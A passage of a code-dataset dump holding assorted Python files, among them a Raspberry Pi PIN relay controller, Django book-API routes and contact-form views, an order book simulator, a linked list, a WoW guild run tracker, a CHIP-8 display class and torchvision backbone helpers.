granted.\")\n\n select_relay_to_activate()\n\n\n# Construct the entered PIN code\ndef digit_entered(key):\n global entered_pin, correct_pin, entered_pin_is_ok\n\n if entered_pin_is_ok:\n activate_relay(key)\n else:\n entered_pin += str(key)\n print(entered_pin)\n\n lcd.clear()\n lcd.message(\"PIN: \" + entered_pin + \"\\n\")\n lcd.message(\"# to confirm\")\n\n check_pin(key)\n\n\n# Display info on in-corrected PIN code and exit\ndef incorrect_pin_entered():\n lcd.clear()\n lcd.message(\"Access denied\\n\")\n lcd.message(\"Incorrect PIN\\n\")\n\n print(\"Incorrect PIN. 
Access denied.\")\n\n    time.sleep(5)\n    cleanup()\n    sys.exit()\n\n\n# Initialize the I2C LCD 1602 Display\ndef initialize_lcd():\n    mcp.output(3, 1) # turn on LCD backlight\n    lcd.begin(16, 2) # set number of LCD lines and columns\n\n    lcd.message(\"Enter your PIN\\n\")\n    lcd.message(\"Press * to clear\")\n\n\n# Initialize the GPIO for the relay module\ndef initialize_relay():\n    for relay_id, bcm_value in dict_relay_bcm.items():\n        GPIO.setup(bcm_value, GPIO.OUT, initial=GPIO.HIGH)\n\n\n# Handle keys that are not PIN digits\ndef non_digit_entered(key):\n    global entered_pin\n\n    if key == \"C\":\n        cleanup()\n        sys.exit()\n\n    if not entered_pin_is_ok and key == \"*\" and len(entered_pin) > 0:\n        entered_pin = entered_pin[:-1]\n\n        lcd.clear()\n        lcd.message(\"PIN: \" + entered_pin + \"\\n\")\n        lcd.message(\"# to confirm\")\n\n        print(entered_pin)\n\n    if not entered_pin_is_ok and key == \"#\" and len(entered_pin) > 0:\n        check_pin(key)\n\n\n# Display selected relay to activate\ndef select_relay_to_activate():\n    lcd.clear()\n    lcd.message(\"Digit Relay Id\\n\")\n    lcd.message(\"to activate\")\n\n    print(\"Which relay do you want activate/deactivate (1,2,3,4)?\")\n\n\n# Key press handler\ndef key_pressed(key):\n    try:\n        int_key = int(key)\n        if 0 <= int_key <= 9:\n            digit_entered(key)\n    except ValueError:\n        non_digit_entered(key)\n\n\n\ntry:\n    factory = rpi_gpio.KeypadFactory()\n    keypad = factory.create_keypad(keypad=KEYPAD, row_pins=ROW_PINS, col_pins=COL_PINS)\n\n    keypad.registerKeyPressHandler(key_pressed)\n\n    initialize_lcd()\n    initialize_relay()\n\n    print(\"Enter your PIN:\")\n    print(\"Press * to clear previous digit.\")\n    print(\"Press # to confirm.\")\n    print(\"Press C to exit.\")\n\n    while True:\n        time.sleep(1)\nexcept KeyboardInterrupt:\n    print(\"Goodbye\")\nfinally:\n    cleanup()\n","sub_path":"activate_relay_via_pin_code.py","file_name":"activate_relay_via_pin_code.py","file_ext":"py","file_size_in_byte":6140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"88289858","text":"from django.urls import path\nfrom .views import (\n    UserListAPIView,\n    UserDetailListAPIView,\n    UserEditListAPIView,\n    UserDeleteListAPIView,\n    BookCreateListAPIView,\n    BookListAPIView,\n    CategoryCreateAPIView,\n    CategoryListAPIView,\n    BookDeleteAPIView,\n    BookEditAPIView,\n    BookDetailAPIView,\n    CategoryDetailAPIView,\n    CategoryDeleteAPIView,\n    CategoryEditAPIView,\n)\n\nurlpatterns = [\n    path('users/', UserListAPIView.as_view(), name='all users'),\n    path('users/<int:pk>/', UserDetailListAPIView.as_view(), name='user detail'),\n    path('users/<int:pk>/edit/', UserEditListAPIView.as_view(), name='user edit'),\n    path('users/<int:pk>/delete/', UserDeleteListAPIView.as_view(), name='delete user'),\n    path('book/create/', BookCreateListAPIView.as_view(), name='book create'),\n    path('books/', BookListAPIView.as_view(), name='all books'),\n    path('category/create/', CategoryCreateAPIView.as_view(), name='create category'),\n    path('categories/', CategoryListAPIView.as_view(), name='all categories'),\n    path('category/<int:pk>/edit/', CategoryEditAPIView.as_view(), name='edit category'),\n    path('category/<int:pk>/', CategoryDetailAPIView.as_view(), name='detail of category'),\n    path('category/<int:pk>/delete/', CategoryDeleteAPIView.as_view(), name='delete category'),\n    path('book/<int:pk>/edit/', BookEditAPIView.as_view(), name='edit book'),\n    path('book/<int:pk>/detail/', BookDetailAPIView.as_view(), name='detail book'),\n    path('book/<int:pk>/delete/', BookDeleteAPIView.as_view(), name='delete 
book'),\n\n\n]\n\n","sub_path":"adminuser/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"73899763","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# Copyright 2018 Gabriele Iannetti <g.iannetti@gsi.de>\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see <http://www.gnu.org/licenses/>.\n#\n\n\nimport pandas as pd\n\nimport matplotlib\n# Force matplotlib to not use any X window backend.\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nfrom chart.base_chart import BaseChart\n\n\nclass TrendChart(BaseChart):\n\n def __init__(self, title, dataset, file_path, x_label, y_label):\n\n if type(dataset) != pd.DataFrame:\n raise RuntimeError('As dataset a Pandas Data Frame is required!')\n\n if not len(dataset):\n raise RuntimeError('Retrieved an empty Pandas Data Frame!')\n\n super(TrendChart, self).__init__(title, dataset, file_path, x_label, y_label)\n\n self.start_date = self.dataset.index.min().strftime('%Y-%m-%d')\n self.end_date = self.dataset.index.max().strftime('%Y-%m-%d')\n\n # No bright colors.\n self.color_name = 'Dark2'\n\n def _add_sorted_legend(self, df_tail):\n \"\"\"\n Adds a sorted legend to the figure sorted by the last values retrieved\n from the given Pandas Data Frame last values.\n :param df_tail: Tail from Pandas Data Frame.\n \"\"\"\n\n df_tail_labels = df_tail.columns.values\n df_tail_values = df_tail.values.tolist()[0]\n df_pairs = zip(df_tail_labels, df_tail_values)\n\n import operator\n sorted_df_pairs = \\\n sorted(df_pairs, key=operator.itemgetter(1), reverse=True)\n\n sorted_labels = [ item[0] for item in sorted_df_pairs ]\n\n ax_handles, ax_labels = self._ax.get_legend_handles_labels()\n\n ax_pairs = list(zip(ax_handles, ax_labels))\n ax_pairs.sort(key=lambda ax_pairs: sorted_labels.index(ax_pairs[1]))\n\n handles, labels = zip(*ax_pairs)\n\n self._figure.legend(handles=handles, labels=labels, title=\"Groups\",\n fontsize='small', loc='upper left', handlelength=5)\n\n def _draw(self):\n\n line_style_def = ['-', '--', '-.', ':']\n len_lsd = len(line_style_def)\n line_styles = list()\n\n for i in range(len(self.dataset.keys())):\n line_styles.append(line_style_def[i % len_lsd])\n\n self._ax.yaxis.set_major_locator(plt.MaxNLocator(12))\n\n color_map = \\\n BaseChart._create_colors(self.color_name, len(self.dataset.keys()))\n\n self.dataset.plot(ax=self._ax, legend=False, style=line_styles, color=color_map, grid=True)\n\n sub_title = \"Date from %s to %s\" % (self.start_date, self.end_date)\n\n self._ax.set_title(sub_title, fontsize=12)\n\n self._add_sorted_legend(self.dataset.tail(1))\n","sub_path":"chart/trend_chart.py","file_name":"trend_chart.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"32890583","text":"from _queue import Queue\r\nfrom _base import 
BookBase\r\nfrom marketsim import Side, registry, timeserie\r\n\r\nclass Bids(Queue):\r\n \"\"\" Queue of limit orders buy\r\n \"\"\"\r\n \r\n def __init__(self, *args):\r\n Queue.__init__(self, *args)\r\n \r\n @property\r\n def label(self):\r\n return self.book.label + \"_{Bids}\"\r\n\r\n side = Side.Buy\r\n\r\n\r\nclass Asks(Queue):\r\n \"\"\" Queue of limit orders buy\r\n \"\"\"\r\n \r\n def __init__(self, *args):\r\n Queue.__init__(self, *args)\r\n\r\n @property\r\n def label(self):\r\n return self.book.label + \"^{Asks}\"\r\n\r\n side = Side.Sell\r\n\r\nclass Local(BookBase):\r\n \"\"\" Order book for a single asset in a market.\r\n Maintains two order queues for orders of different sides\r\n \"\"\"\r\n def __init__(self, tickSize=1, _digitsToShow = None, label=\"\", timeseries = [],\r\n marketOrderFee = None, # optional function (order, book)-> price to calculate fee for a market order\r\n limitOrderFee = None,\r\n cancelOrderFee = None):\r\n \"\"\" Initializes empty order book with given tick size\r\n \"\"\"\r\n BookBase.__init__(self, \r\n Bids(tickSize, self), \r\n Asks(tickSize, self), \r\n label, timeseries)\r\n \r\n self._digitsToShow = _digitsToShow\r\n \r\n if self._digitsToShow is None:\r\n nDigits = 0\r\n d = 1.\r\n while tickSize * d < 1:\r\n nDigits += 1\r\n d *= 10\r\n self._digitsToShow = nDigits\r\n \r\n self._tickSize = tickSize\r\n self._marketOrderFee = marketOrderFee\r\n self._limitOrderFee = limitOrderFee\r\n self._cancelOrderFee = cancelOrderFee\r\n\r\n _properties = {'tickSize' : float, \r\n '_digitsToShow' : int }\r\n\r\n @property\r\n def tickSize(self):\r\n \"\"\" Returns the tick side\r\n \"\"\"\r\n return self._tickSize\r\n \r\n @tickSize.setter\r\n def tickSize(self, value):\r\n self._tickSize = value\r\n\r\n def cancelOrder(self, order):\r\n \"\"\" To be called when 'order' is cancelled\r\n \"\"\"\r\n if self._cancelOrderFee:\r\n order.charge(self._cancelOrderFee(order, self))\r\n \r\n self.queue(order.side).cancelOrder(order)\r\n\r\n def evaluateOrderPrice(self, side, volume):\r\n \"\"\" Evaluates price at which a market order of given 'side' \r\n and having given 'volume' would be executed \r\n \"\"\"\r\n return self._queues[side.opposite.id].evaluateOrderPrice(volume)\r\n \r\n def evaluateOrderPriceAsync(self, side, volume, callback):\r\n callback(self.evaluateOrderPrice(side, volume))\r\n\r\n def evaluateVolumesForBudget(self, side, budget, callback):\r\n res = list(self._queues[side.opposite.id].pvsForFixedBudget(budget))\r\n callback(res)\r\n \r\n \r\n def processLimitOrder(self, order):\r\n \"\"\" Processes 'order' as limit order:\r\n If it is not matched completely, it stays at the order queue\r\n \"\"\"\r\n assert order.owner is not None\r\n\r\n if self._limitOrderFee:\r\n order.charge(self._limitOrderFee(order, self))\r\n \r\n if not self._queues[order.side.opposite.id].matchWith(order):\r\n self._queues[order.side.id].push(order)\r\n\r\n def processMarketOrder(self, order):\r\n \"\"\" Processes 'order' as market order:\r\n Iff it is not matched completely, returns False\r\n \"\"\"\r\n assert order.owner is not None\r\n \r\n if self._marketOrderFee:\r\n order.charge(self._marketOrderFee(order, self))\r\n \r\n return self._queues[order.side.opposite.id].matchWith(order)\r\n","sub_path":"marketsim/orderbook/_local.py","file_name":"_local.py","file_ext":"py","file_size_in_byte":3744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"160758788","text":"'''\ndefines singly linked list\n'''\nclass 
Node :\n '''\n defines a single linked list's node\n '''\n def __init__(self,data=0):\n self.data=data #assign data\n self.next=None\n \n \n\n\nclass singleLL:\n\n # initialize the single linked list with 0 node\n def __init__( self, head=None ):\n self.head = head\n \n \n def insert( self, data, pos=-1 ):\n # create a new node\n new_node = Node(data)\n\n if not self.head:\n # first node creation\n self.head = new_node\n return self.head\n elif pos == 0:\n # insertion at beginning\n new_node.next = self.head\n self.head = new_node\n \n # if position is not defined, by default insert at last\n elif pos == -1:\n # last node insertion\n n = self.head\n while (n.next):\n n = n.next\n n.next = new_node\n new_node.next = None\n else:\n assert pos >= 0, \"Enter position to insert element more than or equal to 0\"\n # traverse to pos\n i=0\n n = self.head\n while ( i < pos-1 ):\n i+=1\n n = n.next \n # now insert the node \n new_node.next = n.next\n n.next = new_node\n return self.head\n\n def printLL (self):\n \n n = self.head\n while (n.next):\n print(\"{}\".format(n.data), end=' -> ')\n n = n.next\n\n print(\"{}\\n\".format(n.data))\n \n def delete(self,pos=-1):\n '''\n by default deletes the last element in the list\n '''\n if not self.head:\n print(\"Empty list!!\")\n return False\n # if delete the head node\n if pos==0:\n self.head = self.head.next\n return self.head\n elif pos == -1 :\n # delete last element\n n = self.head\n while(n.next.next):\n n=n.next\n n.next = None\n return True\n \n else:\n n = self.head\n i = 0\n while (i < pos-1):\n n=n.next\n i+=1\n tmp = n.next\n n.next = n.next.next\n tmp.next = None\n return True\n\n\n \n \nif __name__ == \"__main__\":\n # create empty single linked list\n sll = singleLL()\n \n # insert elements\n for i in range(2,33,2):\n sll.insert(i)\n \n # display all \n sll.printLL()\n \n # insertion check\n print( \"inserting 1 in the starting\")\n sll.insert(1,0)\n sll.printLL()\n\n print( \"inserting 3 at postion 2nd( 0 based indexing )\")\n sll.insert(3,2)\n sll.printLL()\n\n print( \"deleting head node\")\n sll.delete(0)\n sll.printLL()\n\n print( \"deleting last node\")\n sll.delete()\n sll.printLL()\n\n print( \"deleting 1st node\")\n sll.delete(1)\n sll.printLL()\n","sub_path":"singleLL.py","file_name":"singleLL.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"590244886","text":"from distutils.command.config import config\n\nfrom django.shortcuts import render_to_response\nfrom django.http import HttpResponseBadRequest, HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom about_us.models import Partners\nfrom advertising.models import TypeExamples, CategoryExamples\nfrom .util import union\nfrom about_us.models import BackgroundImages, IndexNumbers\nfrom django.core.mail import EmailMessage, BadHeaderError\nfrom triera.settings import RECEPIENT_EMAIL\nimport json\nfrom random import shuffle\nfrom advertising.models import Type\n\n\ndef index_view(request):\n examples = list(union(TypeExamples.objects.all(), CategoryExamples.objects.all()))\n shuffle(examples)\n types = Type.objects.all()\n return render_to_response('html/index.html', {\"examples\": examples[:6],\n \"partners\": Partners.objects.all(),\n \"background\": BackgroundImages.objects.filter(title=\"Главная\").first(),\n \"numbers\": IndexNumbers.objects.first(),\n \"first\": types[:4],\n \"second\": types[4:]\n })\n\n\ndef contacts_view(request):\n return 
render_to_response('html/contacts.html', {\"background\": BackgroundImages.objects.filter(title=\"Контакты\").first()})\n\n\n@csrf_exempt\ndef callback_form(request):\n if request.method == \"POST\":\n body_unicode = request.body.decode('utf-8')\n details = json.loads(body_unicode)\n message = \"Имя: \" + details.pop(\"name\") + \"\\n\"\n message += \"Тема: \" + details.pop(\"topic\") + \"\\n\"\n message += \"Удобное время: \" + details.pop(\"preferredTime\") + \"\\n\"\n message += \"Телефон: \" + details.pop(\"phone\") + \"\\n\"\n message += \"Email: \" + details.pop(\"email\") + \"\\n\"\n\n try:\n email = EmailMessage(\"Заказ на обратный звонок\", message, to=[RECEPIENT_EMAIL])\n email.send()\n except BadHeaderError:\n return HttpResponse('Invalid header found.', content_type='text/plain')\n except Exception as e:\n print(e)\n return HttpResponse('error', content_type='text/plain')\n return HttpResponse(\"success\", content_type='text/plain')\n else:\n return HttpResponse(\"error\", content_type='text/plain')\n\n\n@csrf_exempt\ndef send_form(request):\n if request.method == \"POST\":\n body_unicode = request.body.decode('utf-8')\n details = json.loads(body_unicode)\n message = \"Имя: \" + details.pop(\"name\") + \"\\n\"\n message += \"Компания: \" + details.pop(\"company\") + \"\\n\"\n message += \"Телефон: \" + details.pop(\"phone\") + \"\\n\"\n message += \"Email: \" + details.pop(\"email\") + \"\\n\\n\\n\"\n message += details.pop(\"body\") + \"\\n\"\n\n try:\n email = EmailMessage(\"Связаться с нами\", message, to=[RECEPIENT_EMAIL])\n email.send()\n except BadHeaderError:\n return HttpResponse('Invalid header found.')\n except Exception as e:\n return HttpResponse('error', content_type='text/plain')\n return HttpResponse(\"success\", content_type='text/plain')\n else:\n return HttpResponseBadRequest\n\n\ndef robots_view(request):\n return render_to_response(\"robots.txt\", content_type=\"text/plain\")\n","sub_path":"triera/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"107864256","text":"from time import strftime\nfrom json import dump, load\nfrom logging import root\nfrom os.path import join, exists\nfrom os import mkdir\nfrom datetime import datetime, timedelta\nfrom requests.api import get\nimport pytz\n\nfrom WOW import WOW_getGuildRoster\nfrom updateMeta import NumberToClassName, getColorForRunScore, getColorForScore, NumberToClassColor\nfrom RIO import RIO_GetCharData, RIO_GetCharRankings, RIO_GetRecentRuns\nfrom updatePage import AddScoreColors, AddTimeAndPercDiff\nfrom updateMeta import updateTimeFile\n\n\n\n\ndef UpdateGuildRoster(rosterfile):\n guildData = WOW_getGuildRoster()\n writeObj = {}\n\n for member in guildData:\n char = member['character']\n\n if char['level'] == 60:\n name = char['name']\n realm = char['realm']['slug']\n\n rio_data = RIO_GetCharRankings(name,realm)\n \n try: \n rio_link = rio_data['profile_url']\n rio_score = rio_data['mythic_plus_scores_by_season'][0]['scores']['all']\n rio_scoreColor = getColorForScore(rio_score)\n except:\n rio_link = None\n rio_score = 0\n rio_scoreColor = '#ffffff'\n\n writeObj[char['id']] = {\n 'name': name,\n 'realm': realm,\n 'faction': 'horde' if char['realm']['slug'] == 'illidan' else 'alliance',\n 'class': char['playable_class']['id'],\n 'className': NumberToClassName[char['playable_class']['id']],\n 'classColor': NumberToClassColor[char['playable_class']['id']],\n 'race': 
char['playable_race']['id'],\n                'rank': member['rank'],\n                'score': rio_score,\n                'scoreColor': rio_scoreColor,\n                'links': {\n                    'rio': rio_link,\n                    'armory': f'https://worldofwarcraft.com/en-us/character/us/{realm}/{name}',\n                    'wcl': f'https://www.warcraftlogs.com/character/us/{realm}/{name}',\n                    'rbot': f'https://www.raidbots.com/simbot/quick?region=us&realm={realm}&name={name}'\n                }\n            }\n    \n    with open(rosterfile,'w') as f:\n        dump(writeObj, f, indent=2)\n    root.info(\"updated guild roster\")\n    \n\n\ndef UpdateGuildRuns(folder, roster, startDate, endDate):\n\n    rosterData = getRosterData(roster)\n    runData = getAllRuns(rosterData)\n    runData = removeInvalid(runData, startDate, endDate)\n\n    AddScoreColors(runData)\n    AddTimeAndPercDiff(runData)\n\n    runsFile = join(folder, 'runs.json')\n    if exists(runsFile):\n        with open(runsFile,'r') as f:\n            oldRunData = load(f)\n    else:\n        oldRunData = {'data': {}}\n    \n    oldRunData['data'] = {**oldRunData['data'], **runData}\n\n    with open(join(folder,'runs.json'),'w') as f:\n        dump(oldRunData, f, indent=2)\n\n    updateTimeFile(folder)\n    return\n\n\ndef getRosterData(rosterFile):\n    with open(rosterFile, 'r') as f:\n        return load(f)\n\n\ndef getAllRuns(rosterData):\n\n    retval = {}\n\n    for id, member in rosterData.items():\n        playerData = RIO_GetRecentRuns(member['name'], member['realm'])\n\n        for runId, run in playerData.items():\n            if runId in retval.keys():\n                retval[runId]['members'].append(id)\n                retval[runId]['count'] += 1\n            else:\n                retval[runId] = run\n                retval[runId]['members'] = [id]\n                retval[runId]['count'] = 1\n    \n\n    return retval\n\n\ndef removeInvalid(runs, start, end):\n\n    retval = {}\n\n    for runId, runData in runs.items():\n        runDate = datetime.strptime(runData['dateCompleted'], \"%Y-%m-%dT%H:%M:%S.000Z\")\n        startDate = datetime.utcfromtimestamp(start)\n        endDate = datetime.utcfromtimestamp(end)\n\n        if startDate < runDate and runDate < endDate and runData['count'] >= 2:\n            retval[runId] = runData\n    \n    return retval\n    \ndef suffix(d):\n    return 'th' if 11<=d<=13 else {1:'st',2:'nd',3:'rd'}.get(d%10, 'th')\n\n\ndef PrepFolder(folder,start,end,weekNum):\n    if not exists(folder):\n        mkdir(folder)\n\n    metaFile = join(folder,'meta.json')\n    if exists(metaFile): return\n\n    start = datetime.utcfromtimestamp(start) - timedelta(hours=5)\n    end = datetime.utcfromtimestamp(end) - timedelta(hours=5)\n    with open(metaFile, 'w') as f:\n        dump({\n            'num': weekNum,\n            #11 am, Tuesday August 17th\n            'start': start.strftime(f'%-I %P, %A %B %-d{suffix(start.day)}'),\n            'end': end.strftime(f'%-I %P, %A %B %-d{suffix(end.day)}'),\n        },f, indent=2)\n\n\ndef updateGuildMeta(folder, weeknumber):\n    with open(join(folder,'meta.json'),'w') as f:\n        dump({\n            'weekNum' : weeknumber\n        }, f)\n    return","sub_path":"data/updateGuild.py","file_name":"updateGuild.py","file_ext":"py","file_size_in_byte":4314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"252756421","text":"u\"\"\"EXERCISE061.\n\nPython Course===>Professor Gustavo Guanabara--->ModuleII.\n\nRedo DESAFIO051, reading the first term and the common difference of an arithmetic progression (PA), and show the first 10 terms of the progression using a while loop.\n\"\"\"\nprint('Gerador de PA')\nprint('-=' * 10)\nprimeiro = int(input('Digite o primeiro termo da PA: '))\nrazão = int(input('Digite a razão da PA: '))\ntermo = primeiro\ncount = 1\nwhile count <= 10:\n    print('{} ¬'.format(termo), end='')\n    termo += razão\n    count += 
1\nprint('FIM')\n","sub_path":"python3/CursoEmVideo/mundo2/desafio062.py","file_name":"desafio062.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"291391055","text":"# This is the class blueprint for a GPU Object. ---------------------|\nimport pygame\nfrom pygame import Rect\n\n\nclass GPU():\n\tdef __init__(self):\n\t\tself.black = 0,0,0\t\t\t\t\t\t\t\t\t# Define the color black.\n\t\tself.white = 255,255,255\t\t\t\t\t\t\t# Define the color white.\n\t\tself.colors = [self.black, self.white]\t\t\t\t# Colors listing.\n\t\t\n\t\tself.width = 64\t\t\t\t\t\t\t\t\t\t# Sets Max Screen Width.\n\t\tself.height = 32\t\t\t\t\t\t\t\t\t# Sets Max Screen Height.\n\t\tself.pixels = self.width * self.height\t\t\t\t# Calculate the total number of pixels (2,048‬ max).\n\t\tself.size = self.width * 10, self.height * 10\t\t# Scale Screen to larger size.\n\n\t\t# Initialize GPU Memory\n\t\tself.graphics_memory = [0x00] * self.pixels\t\t\t# The main graphics memory for the GPU (2,048k)\n\n\t\t# CPU Connection Variable\n\t\tself.cpu = 0\t\t\t\t\t\t\t\t\t\t# Connects the GPU to the CPU.\n\n\n\tdef screen(self):\n\t\t# Build Main Screen\n\t\tself.screen = pygame.display.set_mode(self.size)\t# Creates a blank window. Window is scaled according to self.size.\n\t\t\n\t\t# Display an initial blank screen.\n\t\tself.screen.fill((0,0,0))\t\t\t\t\t\t\t# Sets all pixels to black and starts the screen.\n\n\n\tdef draw_graphics(self):\n\t\t# Draw entire screen using data stored in GPU memory.\n\t\tfor scanline in range(self.height):\t\t\t\t\t# For each scanline that makes up the screen (32 in total)\n\t\t\tfor pixel_in_scanline in range(self.width):\t\t# Process each pixel in the current scanline.\n\t\t\t\tself.screen.fill( self.colors[self.graphics_memory[pixel_in_scanline + (scanline * self.width)]], Rect(pixel_in_scanline*10, scanline*10, 10, 10) )\n\t\t\t\t\n\t\tpygame.display.flip()\t\t\t\t\t\t\t\t# Update the screen with the new data.\n\t\tself.cpu.draw_flag = False\t\t\t\t\t\t\t# Disable the CPU draw flag.\n\n","sub_path":"chip8_gpu.py","file_name":"chip8_gpu.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"376491755","text":"\n\nfrom xai.brain.wordbase.nouns._texture import _TEXTURE\n\n#calss header\nclass _TEXTURES(_TEXTURE, ):\n\tdef __init__(self,): \n\t\t_TEXTURE.__init__(self)\n\t\tself.name = \"TEXTURES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"texture\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_textures.py","file_name":"_textures.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"604752094","text":"from setuptools import setup, find_packages\nimport os\n\nmoduleDirectory = os.path.dirname(os.path.realpath(__file__))\nexec(open(moduleDirectory + \"/bilbo/__version__.py\").read())\n\n\ndef readme():\n with open(moduleDirectory + '/README.rst') as f:\n return f.read()\n\n\nsetup(name=\"bilbo\",\n version=__version__,\n description=\"Commands to help build and maintain a gollum wiki\",\n long_description=readme(),\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 2.7',\n 'Topic :: Utilities',\n ],\n keywords=['tool, wiki'],\n url='https://github.com/thespacedoctor/bilbo',\n 
download_url='https://github.com/thespacedoctor/bilbo/archive/v%(__version__)s.zip' % locals(\n ),\n author='David Young',\n author_email='davidrobertyoung@gmail.com',\n license='MIT',\n packages=find_packages(),\n include_package_data=True,\n # package_data={'bilbo': [\n # 'resources/*/*', 'resources/*.*', 'resources/*/*/*', 'resources/*/*.*']},\n install_requires=[\n 'pyyaml',\n 'frankenstein',\n 'fundamentals',\n 'titlecase'\n ],\n test_suite='nose2.collector.collector',\n tests_require=['nose2', 'cov-core'],\n entry_points={\n 'console_scripts': ['bilbo=bilbo.cl_utils:main'],\n },\n zip_safe=False)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"137769930","text":"from scrapy.spiders import Spider\nfrom news.items import NewsItem\nimport scrapy\nimport re\n\nclass NewsSpider(Spider):\n    name = 'news'\n    start_urls = ['http://money.163.com/special/002526O3/trade09.html']\n\n    def parse(self, response):\n        for i in range(2,21):\n            url = response.url.replace('.html','') + '_'+'0' + str(i) + '.html'\n            yield scrapy.Request(url,callback=self.parse_page2)\n    def parse_page2(self,response):\n        list = []\n        elements = response.xpath(\"//div[@class = 'list_item clearfix']\")\n        with open('formal.txt','a',encoding='utf8') as f:\n            for element in elements:\n                result = element.xpath(\"./div/h2/a/@href\").extract()[0]\n                if result not in list:\n                    list.append(result)\n                    f.write(result)\n                    f.write('\\n')\n\n\n\n\n\n","sub_path":"news/spiders/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"505902688","text":"# This imports the torchvision defined backbones\n__all__ = [\"create_torchvision_backbone\"]\n\nfrom mantisshrimp.imports import *\n\n\ndef create_torchvision_backbone(backbone: str, pretrained: bool):\n    \"\"\" Creates models from torchvision, uses imagenet pretrained_weights\n\n    Args:\n        backbone (str): The name of the model\n        pretrained (bool): If True uses Imagenet pretrained weights\n    \n    Returns:\n        nn.Module: The model from torchvision\n    \"\"\"\n\n    # These create models from torchvision directly, using imagenet pretrained_weights\n    if backbone == \"mobilenet\":\n        mobile_net = torchvision.models.mobilenet_v2(pretrained=pretrained)\n        ft_backbone = mobile_net.features\n        ft_backbone.out_channels = 1280\n        return ft_backbone\n\n    elif backbone == \"vgg11\":\n        vgg_net = torchvision.models.vgg11(pretrained=pretrained)\n        ft_backbone = vgg_net.features\n        ft_backbone.out_channels = 512\n        return ft_backbone\n\n    elif backbone == \"vgg13\":\n        vgg_net = torchvision.models.vgg13(pretrained=pretrained)\n        ft_backbone = vgg_net.features\n        ft_backbone.out_channels = 512\n        return ft_backbone\n\n    elif backbone == \"vgg16\":\n        vgg_net = torchvision.models.vgg16(pretrained=pretrained)\n        ft_backbone = vgg_net.features\n        ft_backbone.out_channels = 512\n        return ft_backbone\n\n    elif backbone == \"vgg19\":\n        vgg_net = torchvision.models.vgg19(pretrained=pretrained)\n        ft_backbone = vgg_net.features\n        ft_backbone.out_channels = 512\n        return ft_backbone\n\n    elif backbone == \"resnet18\":\n        resnet_net = torchvision.models.resnet18(pretrained=pretrained)\n        modules = list(resnet_net.children())[:-1]\n        ft_backbone = nn.Sequential(*modules)\n        ft_backbone.out_channels = 512\n        return ft_backbone\n\n    elif backbone == \"resnet34\":\n        resnet_net = 
torchvision.models.resnet34(pretrained=pretrained)\n modules = list(resnet_net.children())[:-1]\n ft_backbone = nn.Sequential(*modules)\n ft_backbone.out_channels = 512\n return ft_backbone\n\n elif backbone == \"resnet50\":\n resnet_net = torchvision.models.resnet50(pretrained=pretrained)\n modules = list(resnet_net.children())[:-1]\n ft_backbone = nn.Sequential(*modules)\n ft_backbone.out_channels = 2048\n return ft_backbone\n\n elif backbone == \"resnet101\":\n resnet_net = torchvision.models.resnet101(pretrained=pretrained)\n modules = list(resnet_net.children())[:-1]\n ft_backbone = nn.Sequential(*modules)\n ft_backbone.out_channels = 2048\n return ft_backbone\n\n elif backbone == \"resnet152\":\n resnet_net = torchvision.models.resnet152(pretrained=pretrained)\n modules = list(resnet_net.children())[:-1]\n ft_backbone = nn.Sequential(*modules)\n ft_backbone.out_channels = 2048\n return ft_backbone\n\n elif backbone == \"resnext101_32x8d\":\n resnet_net = torchvision.models.resnext101_32x8d(pretrained=pretrained)\n modules = list(resnet_net.children())[:-1]\n ft_backbone = nn.Sequential(*modules)\n ft_backbone.out_channels = 2048\n return ft_backbone\n\n else:\n raise ValueError(\"No such backbone implemented in mantisshrimp\")\n","sub_path":"mantisshrimp/backbones/torchvision_backbones.py","file_name":"torchvision_backbones.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"389442247","text":"def table(k) :\n n = 1\n while n <= 11 :\n print(n*k,end=\" \")\n n=n+1\n\ntable(9)\nprint(\"\\n\")\n\ndef tableTrois(k) :\n n = 3\n while n <= 5 :\n print(n*k,end=\" \")\n n=n+1\n\ntableTrois(9)\nprint(\"\\n\")\n\ndef 